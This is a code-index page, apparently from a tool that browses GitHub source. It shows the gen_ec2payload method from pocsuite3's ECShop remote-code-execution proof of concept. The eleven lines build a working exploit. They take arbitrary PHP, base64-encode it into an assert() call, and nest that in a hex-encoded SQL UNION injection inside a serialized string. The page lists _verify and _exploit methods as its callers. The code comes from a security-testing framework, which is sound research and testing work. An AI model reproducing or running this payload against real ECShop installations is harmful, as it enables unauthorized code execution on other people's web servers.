MCPcopy
hub / github.com/knownsec/pocsuite3 / gen_ec2payload

Method gen_ec2payload

pocsuite3/pocs/ecshop_rce.py:50–60  ·  view source on GitHub ↗
(self, phpcode)

Source from the content-addressed store, hash-verified

48 return o
49
50 def gen_ec2payload(self, phpcode):
51 # ECShop 2.x payload
52 encoded_code = base64.b64encode(phpcode.encode())
53
54 payload = """{$asd'];assert(base64_decode('%s'));//}xxx""" % (
55 encoded_code.decode())
56 payload = binascii.hexlify(payload.encode()).decode()
57 payload = '*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x{},10-- -'.format(payload)
58 payload = '''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:%s:"%s";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca''' % (
59 len(payload), payload)
60 return payload
61
62 def gen_ec3payload(self, phpcode):
63 # ECShop 3.x payload

Callers 2

_verifyMethod · 0.95
_exploitMethod · 0.95

Calls 2

encodeMethod · 0.45
decodeMethod · 0.45

Tested by

no test coverage detected